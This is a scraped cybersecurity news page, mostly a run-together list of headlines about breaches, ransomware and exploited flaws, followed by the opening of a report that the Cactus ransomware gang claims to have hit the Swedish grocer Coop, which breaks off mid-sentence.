Cactus RANSOMWARE gang hit the Swedish retail and grocery provider Coop

pMy Slice an Italian adaptive phishing campaignppThreat actors exploit Apache ActiveMQ flaw to deliver the Godzilla Web ShellppCybercriminals leaked massive volumes of stolen PII data from Thailand in Dark WebppBackdoored pirated applications targets Apple macOS usersppLockBit ransomware gang claims the attack on the sandwich chain SubwayppSecurity Affairs newsletter Round 455 by Pierluigi Paganini INTERNATIONAL EDITIONppAdmin of the BreachForums hacking forum sentenced to 20 years supervised releaseppVF Corp December data breach impacts 35 million customersppChinalinked APT UNC3886 exploits VMware zeroday since 2021ppRansomware attacks break records in 2023 the number of victims rose by 128ppUS CISA warns of actively exploited Ivanti EPMM flaw CVE202335082ppThe Quantum Computing Cryptopocalypse Ill Know It When I See ItppKansas State University suffered a serious cybersecurity incidentppCISA adds Chrome and Citrix NetScaler to its Known Exploited Vulnerabilities catalogppGoogle TAG warns that Russian COLDRIVER APT is using a custom backdoorppPixieFail Nine flaws in UEFI opensource reference implementation could have severe impactsppiShutdown lightweight method allows to discover spyware infections on iPhonesppProRussia group hit Swiss govt sites after Zelensky visit in DavosppGithub rotated credentials after the discovery of a vulnerabilityppFBI CISA warn of AndroxGh0st botnet for victim identification and exploitationppCitrix warns admins to immediately patch NetScaler for actively exploited zerodaysppGoogle fixed the first actively exploited Chrome zeroday of 2024ppAtlassian fixed critical RCE in older Confluence versionsppVMware fixed a critical flaw in Aria Automation Patch it nowppExperts warn of mass exploitation of Ivanti Connect Secure VPN flawsppExperts warn of a vulnerability affecting Bosch BCC100 ThermostatppOver 178000 SonicWall nextgeneration firewalls NGFW online exposed to hackppPhemedrone info stealer campaign exploits Windows smartScreen bypassppBalada Injector continues to infect thousands of WordPress sitesppAttackers target Apache Hadoop and Flink to deliver cryptominersppApple fixed a bug in Magic Keyboard that allows to monitor Bluetooth trafficppSecurity Affairs newsletter Round 454 by Pierluigi Paganini INTERNATIONAL EDITIONppGitLab fixed a critical zeroclick account hijacking flawppJuniper Networks fixed a critical RCE bug in its firewalls and switchesppVast Voter Data Leaks Cast Shadow Over Indonesia s 2024 Presidential ElectionppResearchers created a PoC for Apache OFBiz flaw CVE202351467ppTeam Liquids wiki leak exposes 118K usersppCISA adds Ivanti and Microsoft SharePoint bugs to its Known Exploited Vulnerabilities catalogppTwo zeroday bugs in Ivanti Connect Secure actively exploitedppX Account of leading cybersecurity firm Mandiant was hacked because not adequately protectedppCisco fixed critical Unity Connection vulnerability CVE202420272ppShinyHunters member sentenced to three years in prisonppHMG Healthcare disclosed a data breachppThreat actors hacked the X account of the Securities and Exchange Commission SEC and announced fake Bitcoin ETF approvalppDecryptor for Tortilla variant of Babuk ransomware releasedppMicrosoft Patch Tuesday for January 2024 fixed 2 critical flawsppCISA adds Apache Superset bug to its Known Exploited Vulnerabilities catalogppSyrian group Anonymous Arabic distributes stealthy malware Silver RATppSwiss Air Force sensitive files stolen in the hack of Ultra Intelligence CommunicationsppDoJ charged 19 individuals in a transnational cybercrime investigation xDedic MarketplaceppLongexisting Bandook RAT targets Windows machinesppA cyber attack hit the Beirut International AirportppIranian crypto exchange Bit24cash leaks user passports and IDsppSecurity Affairs newsletter Round 453 by Pierluigi Paganini INTERNATIONAL EDITIONppTurkish Sea Turtle APT targets Dutch IT and Telecom firmsppExperts spotted a new macOS Backdoor named SpectralBlur linked to North KoreappMerck settles with insurers regarding a 14 billion claim over NotPetya damagesppThe source code of Zeppelin Ransomware sold on a hacking forumppRussialinked APT Sandworm was inside Ukraine telecoms giant Kyivstar for monthsppIvanti fixed a critical EPM flaw that can result in remote code executionppMyEstatePoint Property Search Android app leaks user passwordsppHacker hijacked Orange Spain RIPE account causing internet outage to company customersppHealthEC data breach impacted more than 45 Million peopleppExperts found 3 malicious packages hiding crypto miners in PyPi repositoryppCrooks hacked Mandiant X account to push cryptocurrency scamppCybercriminals Implemented Artificial Intelligence AI for Invoice FraudppCISA ADDS CHROME AND PERL LIBRARY FLAWS TO ITS KNOWN EXPLOITED VULNERABILITIES CATALOGppDont trust links with known domains BMW affected by redirect vulnerabilityppHackers stole more than 81 million worth of crypto assets from Orbit ChainppUkraines SBU said that Russias intelligence hacked surveillance cameras to direct a missile strike on KyivppExperts warn of JinxLoader loader used to spread Formbook and XLoaderppTerrapin attack allows to downgrade SSH protocol securityppMultiple organizations in Iran were breached by a mysterious hackerppTop 2023 Security Affairs cybersecurity storiesppMalware exploits undocumented Google OAuth endpoint to regenerate Google cookiesppCactus RANSOMWARE gang hit the Swedish retail and grocery provider CoopppGoogle agreed to settle a 5 billion privacy lawsuitppSecurity Affairs newsletter Round 452 by Pierluigi Paganini INTERNATIONAL EDITIONppINC RANSOM ransomware gang claims to have breached Xerox CorpppSpotify music converter TuneFab puts users at riskppCyber attacks hit the Assembly of the Republic of Albania and telecom company One AlbaniappRussialinked APT28 used new malware in a recent phishing campaignppClash of Clans gamers at risk while using thirdparty appppNew Version of Meduza Stealer Released in Dark WebppOperation Triangulation attacks relied on an undocumented hardware featureppCybercriminals launched Leaksmas event in the Dark Web exposing massive volumes of leaked PII and compromised datappLockbit ransomware attack interrupted medical emergencies gang at a German hospital networkppExperts warn of critical ZeroDay in Apache OfBizppXamalicious Android malware distributed through the Play StoreppBarracuda fixed a new ESG zeroday exploited by Chinese group UNC4841ppElections 2024 artificial intelligence could upset world balancesppExperts analyzed attacks against poorly managed Linux SSH serversppA cyberattack hit Australian healthcare provider St Vincents Health AustraliappRhysida ransomware group hacked Abdali Hospital in JordanppCarbanak malware returned in ransomware attacksppResecurity Released a 2024 Cyber Threat Landscape ForecastppAPT group UAC0099 targets Ukraine exploiting a WinRAR flawppIranlinked APT33 targets Defense Industrial Base sector with FalseFont backdoorppSecurity Affairs newsletter Round 451 by Pierluigi Paganini INTERNATIONAL EDITIONppEuropol and ENISA spotted 443 estores compromised with digital skimmingppVideo game giant Ubisoft investigates reports of a data breachppLockBit ransomware gang claims to have breached accountancy firm XeinadinppMobile virtual network operator Mint Mobile discloses a data breachppAkira ransomware gang claims the theft of sensitive data from Nissan AustraliappMember of Lapsus gang sentenced to an indefinite hospital orderppReal estate agency exposes details of 690k customersppESET fixed a highseverity bug in the Secure Traffic Scanning Feature of several productsppPhishing attacks use an old Microsoft Office flaw to spread Agent Tesla malwareppData leak exposes users of carsharing service Blink MobilityppGoogle addressed a new actively exploited Chrome zerodayppGerman police seized the dark web marketplace Kingdom MarketppLaw enforcement Operation HAECHI IV led to the seizure of 300 MillionppSophisticated JaskaGO info stealer targets macOS and WindowsppBMW dealer at risk of takeover by cybercriminalsppComcasts Xfinity customer data exposed after CitrixBleed attackppFBI claims to have dismantled AlphVBlackcat ransomware operation but the group denies itppSmishing Triad Cybercriminals Impersonate UAE Federal Authority for Identity and Citizenship on the Peak of Holidays SeasonppThe ransomware attack on Westpole is disrupting digital services for Italian public administrationppInfo stealers and how to protect against themppProIsrael Predatory Sparrow hacker group disrupted services at around 70 of Irans fuel stationsppQakbot is back and targets the Hospitality industryppA supply chain attack on crypto hardware wallet Ledger led to the theft of 600KppMongoDB investigates a cyberattack customer data exposedppInfectedSlurs botnet targets QNAP VioStor NVR vulnerabilityppSecurity Affairs newsletter Round 450 by Pierluigi Paganini INTERNATIONAL EDITIONppNew NKAbuse malware abuses NKN decentralized P2P network protocolppSnatch ransomware gang claims the hack of the food giant Kraft HeinzppMultiple flaws in pfSense firewall can lead to arbitrary code executionppBianLian White Rabbit and Mario Ransomware Gangs Spotted in a Joint CampaignppData of over a million users of the crypto exchange GokuMarket exposedppIdaho National Laboratory data breach impacted 45047 individualsppUbiquiti users claim to have access to other peoples devicesppRussialinked APT29 spotted targeting JetBrains TeamCity serversppMicrosoft seized the US infrastructure of the Storm1152 cybercrime groupppFrench authorities arrested a Russian national for his role in the Hive ransomware operationppChinalinked APT Volt Typhoon linked to KVBotnetppUK Home Office is ignoring the risk of catastrophic ransomware attacks report warnsppOAuth apps used in cryptocurrency mining phishing campaigns and BEC attacksppSophos backports fix for CVE20223236 for EOL firewall firmware versions due to ongoing attacksppDecember 2023 Microsoft Patch Tuesday fixed 4 critical flawsppUkrainian military intelligence service hacked the Russian Federal Taxation ServiceppKyivstar Ukraines largest mobile carrier brought down by a cyber attackppDubais largest taxi app exposes 220K usersppOperation Blacksmith Lazarus exploits Log4j flaws to deploy DLang malwareppApple released iOS 172 to address a dozen of security flawsppToyota Financial Services discloses a data breachppApache fixed Critical RCE flaw CVE202350164 in Struts 2ppCISA adds Qlik Sense flaws to its Known Exploited Vulnerabilities catalogppCISA and ENISA signed a Working Arrangement to enhance cooperationppResearcher discovered a new lock screen bypass bug for Android 14 and 13ppWordPress 642 fixed a Remote Code Execution RCE flawppSecurity Affairs newsletter Round 449 by Pierluigi Paganini INTERNATIONAL EDITIONppHacktivists hacked an Irish water utility and interrupted the water supplypp5Ghoul flaws impact hundreds of 5G devices with Qualcomm MediaTek chipsppNorton Healthcare disclosed a data breach after a ransomware attackppBypassing major EDRs using Pool Party process injection techniquesppFounder of Bitzlato exchange has pleaded for unlicensed money transmittingppAndroid barcode scanner app exposes user passwordsppUK and US expose Russia Callisto Groups activity and sanction membersppA cyber attack hit Nissan OceaniappNew Krasue Linux RAT targets telecom companies in ThailandppAtlassian addressed four new RCE flaws in its productsppCISA adds Qualcomm flaws to its Known Exploited Vulnerabilities catalogppExperts demonstrate a postexploitation tampering technique to display Fake Lockdown modeppGST Invoice Billing Inventory exposes sensitive data to threat actorsppThreat actors breached US govt systems by exploiting Adobe ColdFusion flawppENISA published the ENISA Threat Landscape for DoS Attacks ReportppRussialinked APT28 group spotted exploiting Outlook flaw to hijack MS Exchange accountsppGoogle fixed critical zeroclick RCE in AndroidppNew P2PInfect bot targets routers and IoT devicesppMalvertising attacks rely on DanaBot Trojan to spread CACTUS RansomwareppLockBit on a Roll ICBC Ransomware Attack Strikes at the Heart of the Global Financial OrderppZyxel fixed tens of flaws in Firewalls Access Points and NAS devicesppNew Agent Raccoon malware targets the Middle East Africa and the USppSecurity Affairs newsletter Round 448 by Pierluigi Paganini INTERNATIONAL EDITIONppResearchers devised an attack technique to extract ChatGPT training datappFortunetelling website WeMystic exposes 13M user recordsppExpert warns of Turtle macOS ransomwareppBlack Basta Ransomware gang accumulated at least 107 million in Bitcoin ransom payments since early 2022ppCISA adds ownCloud and Google Chrome bugs to its Known Exploited Vulnerabilities catalogppApple addressed 2 new iOS zeroday vulnerabilitiesppCritical Zoom Room bug allowed to gain access to Zoom TenantsppRhysida ransomware group hacked King Edward VIIs Hospital in LondonppGoogle addressed the sixth Chrome ZeroDay vulnerability in 2023ppOkta reveals additional attackers activities in October 2023 BreachppThousands of secrets lurk in app images on Docker HubppThreat actors started exploiting critical ownCloud flaw CVE202349103ppInternational police operation dismantled a prominent Ukrainebased Ransomware groupppDaixin Team group claimed the hack of North Texas Municipal Water DistrictppHealthcare provider Ardent Health Services disclosed a ransomware attackppUkraines intelligence service hacked Russias Federal Air Transport Agency RosaviatsiappIranian hacker group Cyber Av3ngers hacked the Municipal Water Authority of Aliquippa in PennsylvaniappThe hack of MSP provider CTS potentially impacted hundreds of UK law firmsppSecurity Affairs newsletter Round 447 by Pierluigi Paganini INTERNATIONAL EDITIONppRhysida ransomware gang claimed China Energy hackppNorth Korealinked APT Lazarus is using a MagicLine4NX zeroday flaw in supply chain attackppHamaslinked APT uses Rustbased SysJoker backdoor against IsraelppApp used by hundreds of schools leaking childrens datappMicrosoft launched its new Microsoft Defender Bounty ProgramppExposed Kubernetes configuration secrets can fuel supply chain attacksppNorth Korealinked Konni APT uses Russianlanguage weaponized documentsppClearFake campaign spreads macOS AMOS information stealerppWelltok data breach impacted 85 million patients in the USppNorth Korealinked APT Diamond Sleet supply chain attack relies on CyberLink softwareppAutomotive parts giant AutoZone disclosed data breach after MOVEit hackppNew InfectedSlurs Miraibased botnet exploits two zerodaysppSiegedSec hacktivist group hacked Idaho National Laboratory INLppCISA adds Looney Tunables Linux bug to its Known Exploited Vulnerabilities catalogppCitrix provides additional measures to address Citrix BleedppTor Project removed several relays associated with a suspicious cryptocurrency schemeppExperts warn of a surge in NetSupport RAT attacks against education and government sectorsppThe Top 5 Reasons to Use an API Management PlatformppCanadian government impacted by data breaches of two of its contractorsppRhysida ransomware gang is auctioning data stolen from the British LibraryppRussialinked APT29 group exploited WinRAR 0day in attacks against embassiesppDarkCasino joins the list of APT groups exploiting WinRAR zerodayppUS teenager pleads guilty to his role in credential stuffing attack on a betting siteppSecurity Affairs newsletter Round 446 by Pierluigi Paganini INTERNATIONAL EDITIONpp8Base ransomware operators use a new variant of the Phobos ransomwareppRussian APT Gamaredon uses USB worm LitterDrifter against UkraineppThe board of directors of OpenAI fired Sam AltmanppMedusa ransomware gang claims the hack of Toyota Financial ServicesppCISA adds Sophos Web Appliance bug to its Known Exploited Vulnerabilities catalogppZimbra zeroday exploited to steal government emails by four groupsppVietnam Post exposes 12TB of data including email addressesppSamsung suffered a new data breachppFBI and CISA warn of attacks by Rhysida ransomware gangppCritical flaw fixed in SAP Business One productppLaw enforcement agencies dismantled the illegal botnet proxy service IPStormppGamblers data compromised after casino giant Strendus fails to set passwordppVMware disclosed a critical and unpatched authentication bypass flaw in VMware Cloud Director ApplianceppDanish critical infrastructure hit by the largest cyber attack in Denmarks historyppMajor Australian ports blocked after a cyber attack on DP WorldppNuclear and Oil Gas are Major Targets of Ransomware Groups in 2024ppCISA adds five vulnerabilities in Juniper devices to its Known Exploited Vulnerabilities catalogppLockBit ransomware gang leaked data stolen from BoeingppNorth Korealinked APT Sapphire Sleet targets IT job seekers with bogus skills assessment portalsppThe Lorenz ransomware group hit Texasbased Cogdell Memorial HospitalppThe State of Maine disclosed a data breach that impacted 13M peopleppSecurity Affairs newsletter Round 445 by Pierluigi Paganini INTERNATIONAL EDITIONppPolice seized BulletProftLink phishingasaservice PhaaS platformppSerbian pleads guilty to running Monopoly dark web drug marketppMcLaren Health Care revealed that a data breach impacted 22 million peopleppAfter ChatGPT Anonymous Sudan took down the Cloudflare websiteppIndustrial and Commercial Bank of China ICBC suffered a ransomware attackppSysAid zeroday exploited by Clop ransomware groupppDollycom pays ransom attackers release data anywayppDDoS attack leads to significant disruption in ChatGPT servicesppRussian Sandworm disrupts power in Ukraine with a new OT attackppVeeam fixed multiple flaws in Veeam ONE including critical issuesppProPalestinian hackers group Soldiers of Solomon disrupted the production cycle of the biggest flour production plant in IsraelppIranian Agonizing Serpens APT is targeting Israeli entities with destructive cyber attacksppCritical Confluence flaw exploited in ransomware attacksppQNAP fixed two critical vulnerabilities in QTS OS and appsppAttackers use Google Calendar RAT to abuse Calendar service as C2 infrastructureppSocks5Systemz proxy service delivered via PrivateLoader and AmadeyppUS govt sanctioned a Russian woman for laundering virtual currency on behalf of threat actorsppSecurity Affairs newsletter Round 444 by Pierluigi Paganini INTERNATIONAL EDITIONppLazarus targets blockchain engineers with new KandyKorn macOS MalwareppKinsing threat actors probed the Looney Tunables flaws in recent attacksppZDI discloses four zeroday flaws in Microsoft ExchangeppOkta customer support system breach impacted 134 customersppMultiple WhatsApp mods spotted containing the CanesSpy SpywareppRussian FSB arrested Russian hackers who supported Ukrainian cyber operationsppMuddyWater has been spotted targeting two Israeli entitiesppClop group obtained access to the email addresses of about 632000 US federal employeesppOkta discloses a new data breach after a thirdparty vendor was hackedppSuspected exploitation of Apache ActiveMQ flaw CVE202346604 to install HelloKitty ransomwareppBoeing confirmed its services division suffered a cyberattackppResecurity Insecurity of 3rdparties leads to Aadhaar data leaks in IndiappWho is behind the Mozi Botnet kill switchppCISA adds two F5 BIGIP flaws to its Known Exploited Vulnerabilities catalogppThreat actors actively exploit F5 BIGIP flaws CVE202346747 and CVE202346748ppProHamas hacktivist group targets Israel with BiBiLinux wiperppBritish Library suffers major outage due to cyberattackppCritical Atlassian Confluence flaw can lead to significant data lossppWiHD leak exposes details of all torrent usersppExperts released PoC exploit code for Cisco IOS XE flaw CVE202320198ppCanada bans WeChat and Kaspersky apps on governmentissued mobile devicesppFlorida man sentenced to prison for SIM Swapping conspiracy that led to theft of 1M in cryptocurrencyppWikiSlack attack allows redirecting business professionals to malicious websitesppHackerOne awarded over 300 million bug huntersppStripedFly a complex malware that infected one million devices without being noticedppIT Army of Ukraine disrupted internet providers in territories occupied by RussiappSecurity Affairs newsletter Round 443 by Pierluigi Paganini INTERNATIONAL EDITIONppBug hunters earned 1038250 for 58 unique 0days at Pwn2Own Toronto 2023ppLockbit ransomware gang claims to have stolen data from BoeingppHow to Collect Market Intelligence with Residential ProxiesppF5 urges to address a critical flaw in BIGIPppHello Alfred app exposes user datappiLeakage attack exploits Safari to steal data from Apple devicesppCloudflare mitigated 89 hypervolumetric HTTP distributed DDoS attacks exceeding 100 million rpsppSeiko confirmed a data breach after BlackCat attackppWinter Vivern APT exploited zeroday in Roundcube webmail software in recent attacksppPwn2Own Toronto 2023 Day 1 organizers awarded 438750 in prizesppVMware addressed critical vCenter flaw also for EndofLife productsppCitrix warns admins to patch NetScaler CVE20234966 bug immediatelyppNew England Biolabs leak sensitive datappFormer NSA employee pleads guilty to attempted selling classified documents to RussiappExperts released PoC exploit code for VMware Aria Operations for Logs flaw Patch it nowppHow did the Okta Support breach impact 1PasswordppPII Belonging to Indian Citizens Including their Aadhaar IDs Offered for Sale on the Dark WebppSpain police dismantled a cybercriminal group who stole the data of 4 million individualsppCISA adds second Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalogppCisco warns of a second IOS XE zeroday used to infect devices worldwideppCity of Philadelphia suffers a data breachppSolarWinds fixed three critical RCE flaws in its Access Rights Manager productppDont use AIbased apps Philippine defense ordered its personnelppVietnamese threat actors linked to DarkGate malware campaignppMI5 chief warns of Chinese cyber espionage reached an unprecedented scaleppThe attack on the International Criminal Court was targeted and sophisticatedppSecurity Affairs newsletter Round 442 by Pierluigi Paganini INTERNATIONAL EDITIONppA threat actor is selling access to Facebook and Instagrams Police PortalppThreat actors breached Okta support system and stole customers datappUS DoJ seized domains used by North Korean IT workers to defraud businesses worldwideppAlleged developer of the Ragnar Locker ransomware was arrestedppCISA adds Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalogppTens of thousands Cisco IOS XE devices were hacked by exploiting CVE202320198ppLaw enforcement operation seized Ragnar Locker groups infrastructureppTHE 11TH EDITION OF THE ENISA THREAT LANDSCAPE REPORT IS OUTppNorth Korealinked APT groups actively exploit JetBrains TeamCity flawppMultiple APT groups exploited WinRAR flaw CVE202338831ppCalifornian IT company DNA Micro leaks private mobile phone datappThreat actors have been exploiting CVE20234966 in Citrix NetScaler ADCGateway devices since AugustppA flaw in Synology DiskStation Manager allows admin account takeoverppDLink confirms data breach but downplayed the impactppCVE202320198 zeroday widely exploited to install implants on Cisco IOS XE systemsppRussialinked Sandworm APT compromised 11 Ukrainian telecommunications providersppRansomware realities in 2023 one employee mistake can cost a company millionsppMalwarelaced RedAlert Rocket Alerts app targets Israeli users ppCisco warns of active exploitation of IOS XE zerodayppSignal denies claims of an alleged zeroday flaw in its platformppMicrosoft Defender thwarted Akira ransomware attack on an industrial engineering firmppDarkGate malware campaign abuses Skype and TeamsppThe Alphv ransomware gang stole 5TB of data from the Morrison Community HospitalppSecurity Affairs newsletter Round 441 by Pierluigi Paganini INTERNATIONAL EDITIONppLockbit ransomware gang demanded an 80 million ransom to CDWppCISA warns of vulnerabilities and misconfigurations exploited in ransomware attacksppStayin Alive campaign targets highprofile Asian government and telecom entities Is it linked to ToddyCat APTppFBI and CISA published a new advisory on AvosLocker ransomwareppMore than 17000 WordPress websites infected with the Balada Injector in SeptemberppRansomlooker a new tool to track and analyze ransomware groups activitiesppPhishing the campaigns that are targeting ItalyppA new Magecart campaign hides the malicious code in 404 error pageppCISA adds Adobe Acrobat Reader flaw to its Known Exploited Vulnerabilities catalogppMiraibased DDoS botnet IZ1H9 added 13 payloads to target routersppAir Europa data breach exposed customers credit cardsppOpIsrael FreePalestine OpSaudiArabia How Cyber Actors Capitalize On War Actions Via PsyOpsppMicrosoft Patch Tuesday updates for October 2023 fixed three actively exploited zeroday flawsppNew HTTP2 Rapid Reset technique behind recordbreaking DDoS attacksppExposed security cameras in Israel and Palestine pose significant risksppA flaw in libcue library impacts GNOME Linux systemsppHacktivists in Palestine and Israel after SCADA and other industrial control systemsppLargescale Citrix NetScaler Gateway credential harvesting campaign exploits CVE20233519ppThe source code of the 2020 variant of HelloKitty ransomware was leaked on a cybercrime forumppGazalinked hackers and ProRussia groups are targeting IsraelppFlagstar Bank suffered a data breach once againppAndroid devices shipped with backdoored firmware as part of the BADBOX networkppSecurity Affairs newsletter Round 440 by Pierluigi Paganini International editionppNorth Korealinked Lazarus APT laundered over 900 million through crosschain crimeppQakBot threat actors are still operational after the August takedownppRansomware attack on MGM Resorts costs 110 MillionppCybersecurity why a hotline number could be importantppMultiple experts released exploits for Linux local privilege escalation flaw Looney TunablesppCisco Emergency Responder is affected by a critical Static Credentials bug Fix it immediatelyppBelgian intelligence service VSSE accused Alibaba of possible espionage at European hub in LiegeppCISA adds JetBrains TeamCity and Windows flaws to its Known Exploited Vulnerabilities catalogppNATO is investigating a new cyber attack claimed by the SiegedSec groupppGlobal CRM Provider Exposed Millions of Clients Files OnlineppSony sent data breach notifications to about 6800 individualsppApple fixed the 17th zeroday flaw exploited in attacksppAtlassian Confluence zeroday CVE202322515 actively exploited in attacksppA cyberattack disrupted Lyca Mobile servicesppChipmaker Qualcomm warns of three actively exploited zerodaysppDRM Report Q2 2023 Ransomware threat landscapeppPhishing campaign targeted US executives exploiting a flaw in Indeed job search platformppSan Franciscos transport agency exposes drivers parking permits and addressesppBunnyLoader a new MalwareasaService advertised in cybercrime forumsppExclusive Lighting the Exfiltration Infrastructure of a LockBit Affiliate and moreppTwo hacker groups are back in the news LockBit 30 Black and BlackCatAlphVppEuropean Telecommunications Standards Institute ETSI suffered a data breachppWSFTP flaw CVE202340044 actively exploited in the wildppNational Logistics Portal NLP data leak seaports in India were left vulnerable to takeover by hackersppNorth Korealinked Lazarus targeted a Spanish aerospace companyppRansomware attack on Johnson Controls may have exposed sensitive DHS datappBlackCat gang claims they stole data of 25 million patients of McLaren Health CareppSecurity Affairs newsletter Round 439 by Pierluigi Paganini International editionppALPHVBlackCat ransomware gang hacked the hotel chain Motel OneppFBI warns of dual ransomware attacksppProgress Software fixed two critical severity flaws in WSFTP ServerppChild abuse site taken down organized child exploitation crime suspected exclusiveppA still unpatched zeroday RCE impacts more than 35M Exim serversppChinese threat actors stole around 60000 emails from US State Department in Microsoft breachppMisconfigured WBSC server leaks thousands of passportsppCISA adds JBoss RichFaces Framework flaw to its Known Exploited Vulnerabilities catalogppCisco urges to patch actively exploited IOS zeroday CVE202320109ppDark Angels Team ransomware group hit Johnson ControlsppGOOGLE FIXED THE FIFTH CHROME ZERODAY OF 2023ppRussian zeroday broker is willing to pay 20M for zeroday exploits for iPhones and Android devicesppChinalinked APT BlackTech was spotted hiding in Cisco router firmwareppWatch out CVE20235129 in libwebp library affects millions applicationsppDarkBeam leaks billions of email and password combinationsppRansomedvc in the Spotlight What is Known About the Ransomware Group Targeting Sony and NTT DocomoppTop 5 Problems Solved by Data LineageppThreat actors claim the hack of Sony and the company investigatesppCanadian Flair Airlines left user data leaking for monthsppThe Rhysida ransomware group hit the Kuwait Ministry of FinanceppBORN Ontario data breach impacted 34 million newborns and pregnancy care patientsppXenomorph malware is back after months of hiatus and expands the list of targetsppSmishing Triad Stretches Its Tentacles into the United Arab EmiratesppCrooks stole 200 million worth of assets from Mixin NetworkppA phishing campaign targets Ukrainian military entities with drone manual luresppAlert Patch your TeamCity instance to avoid server hackppIs Gelsemium APT behind a targeted attack in Southeast Asian GovernmentppNigerian National pleads guilty to participating in a millionaire BEC schemeppNew variant of BBTok Trojan targets users of 40 banks in LATAMppDeadglyph a very sophisticated and unknown backdoor targets the Middle EastppAlphv group claims the hack of Clarion a global manufacturer of audio and video equipment for carsppSecurity Affairs newsletter Round 438 by Pierluigi Paganini International editionppNational Student Clearinghouse data breach impacted approximately 900 US schoolsppGovernment of Bermuda blames Russian threat actors for the cyber attackppRecently patched Apple and Chrome zerodays exploited to infect devices in Egypt with Predator spywareppCISA adds Trend Micro Apex One and WorryFree Business Security flaw to its Known Exploited Vulnerabilities catalogppInformation of Air Canada employees exposed in recent cyberattackppSandman APT targets telcos with LuaDream backdoorppApple rolled out emergency updates to address 3 new actively exploited zeroday flawsppUkrainian hackers are behind the Free Download Manager supply chain attackppSpace and defense tech maker Exail Technologies exposes database accessppProRussia hacker group NoName launched a DDoS attack on Canadian airports causing severe disruptionsppExperts found critical flaws in Nagios XI network monitoring softwareppThe dark web drug marketplace PIILOPUOTI was dismantled by Finnish CustomsppInternational Criminal Court hit with a cyber attackppGitLab addressed critical vulnerability CVE20235009ppTrend Micro addresses actively exploited zeroday in Apex One and other security ProductsppShroudedSnooper threat actors target telecom companies in the Middle EastppRecent cyber attack is causing Clorox products shortageppEarth Lusca expands its arsenal with SprySOCKS Linux malwareppMicrosoft AI research division accidentally exposed 38TB of sensitive datappGerman intelligence warns cyberattacks could target liquefied natural gas LNG terminalsppDeepfake and smishing How hackers compromised the accounts of 27 Retool customers in the crypto industryppFBI hacker USDoD leaks highly sensitive TransUnion datappNorth Koreas Lazarus APT stole almost 240 million in crypto assets since JuneppClop gang stolen data from major North Carolina hospitalsppCardX released a data leak notification impacting their customers in ThailandppSecurity Affairs newsletter Round 437 by Pierluigi Paganini International editionppTikTok fined 345M by Irish DPC for violating childrens privacyppDariy Pankov the NLBrute malware author pleads guiltyppDangerous permissions detected in top Android health appsppCaesars Entertainment paid a ransom to avoid stolen data leaksppFree Download Manager backdoored to serve Linux malware for more than 3 yearsppLockbit ransomware gang hit the Carthage Area Hospital and the ClaytonHepburn Medical Center in New YorkppThe iPhone of a Russian journalist was infected with the Pegasus spywareppKubernetes flaws could lead to remote code execution on Windows endpointsppThreat actor leaks sensitive data belonging to AirbusppA new ransomware family called 3AM appears in the threat landscapeppRedfly group infiltrated an Asian national grid as long as six monthsppMozilla fixed a critical zeroday in Firefox and ThunderbirdppMicrosoft September 2023 Patch Tuesday fixed 2 actively exploited zeroday flawsppSave the Children confirms it was hit by cyber attackppAdobe fixed actively exploited zeroday in Acrobat and ReaderppA new Repojacking attack exposed over 4000 GitHub repositories to hackppMGM Resorts hit by a cyber attackppAnonymous Sudan launched a DDoS attack against TelegramppIranian Charming Kitten APT targets various entities in Brazil Israel and the UAE using a new backdoorppGOOGLE FIXED THE FOURTH CHROME ZERODAY OF 2023ppCISA adds recently discovered Apple zerodays to Known Exploited Vulnerabilities CatalogppUK and US sanctioned 11 members of the Russiabased TrickBot gangppNew HijackLoader malware is rapidly growing in popularity in the cybercrime communityppSome of TOP universities wouldnt pass cybersecurity exam left websites vulnerableppEvil Telegram campaign Trojanized Telegram apps found on Google PlayppRhysida Ransomware gang claims to have hacked three more US hospitalsppAkamai prevented the largest DDoS attack on a US financial companyppSecurity Affairs newsletter Round 436 by Pierluigi Paganini International editionppUS CISA added critical Apache RocketMQ flaw to its Known Exploited Vulnerabilities catalogppRagnar Locker gang leaks data stolen from the Israels Mayanei Hayeshua hospitalppNorth Korealinked threat actors target cybersecurity experts with a zerodayppZeroday in Cisco ASA and FTD is actively exploited in ransomware attacksppZerodays fixed by Apple were used to deliver NSO Groups Pegasus spywareppApple discloses 2 new actively exploited zeroday flaws in iPhones MacsppA malvertising campaign is delivering a new version of the macOS Atomic StealerppTwo flaws in Apache SuperSet allow to remotely hack serversppChinese cyberspies obtained Microsoft signing key from Windows crash dump due to a mistakeppGoogle addressed an actively exploited zeroday in AndroidppA zeroday in Atlas VPN Linux Client leaks users IP addressppMITRE and CISA release Caldera for OT attack emulationppASUS routers are affected by three critical remote code execution flawsppHackers stole 41M worth of crypto assets from crypto gambling firm StakeppFreecycle data breach impacted 7 Million usersppMeta disrupted two influence campaigns from China and RussiappA massive DDoS attack took down the site of the German financial agency BaFinppSmishing Triad Targeted USPS and US Citizens for Data TheftppUniversity of Sydney suffered a security breach caused by a thirdparty service providerppCybercrime will cost Germany 224 billion in 2023ppPoC exploit code released for CVE202334039 bug in VMware Aria Operations for NetworksppSecurity Affairs newsletter Round 435 by Pierluigi Paganini International editionppLockBit ransomware gang hit the Commission des services electriques de Montréal CSEMppUNRAVELING EternalBlue inside the WannaCrys enablerppResearchers released a free decryptor for the Key Group ransomwareppFashion retailer Forever 21 data breach impacted 500000 individualsppRussialinked hackers target Ukrainian military with Infamous Chisel Android malwareppAkira Ransomware gang targets Cisco ASA without MultiFactor AuthenticationppParamount Global disclosed a data breachppNational Safety Council data leak Credentials of NASA Tesla DoJ Verizon and 2K others leaked by workplace safety organizationppAbusing Windows Container Isolation Framework to avoid detection by security productsppCritical RCE flaw impacts VMware Aria Operations NetworksppUNC4841 threat actors hacked US government email servers exploiting Barracuda ESG flawppHackers infiltrated Japans National Center of Incident Readiness and Strategy for Cybersecurity NISC for monthsppFIN8linked actor targets Citrix NetScaler systemsppJapans JPCERT warns of new MalDoc in PDF attack techniqueppAttackers can discover IP address by sending a link over the Skype mobile appppCisco fixes 3 highseverity DoS flaws in NXOS and FXOS softwareppCloud and hosting provider Leaseweb took down critical systems after a cyber attackppCrypto investor data exposed by a SIM swapping attack against a Kroll employeeppChinalinked Flax Typhoon APT targets TaiwanppResearchers released PoC exploit for Ivanti Sentry flaw CVE202338035ppResecurity identified a zeroday vulnerability in Schneider Electric Accutech ManagerppCoop is one of the largest retail and grocery providers in Sweden with approximately 800 stores across the country The stores are coowned by 35 million members in 29 consumer associations All surplus that is created in the business goes back to the members or is reinvested in the business which creates a circular cycleppThe Cactus ransomware group claims to have hacked Coop and is threatening to 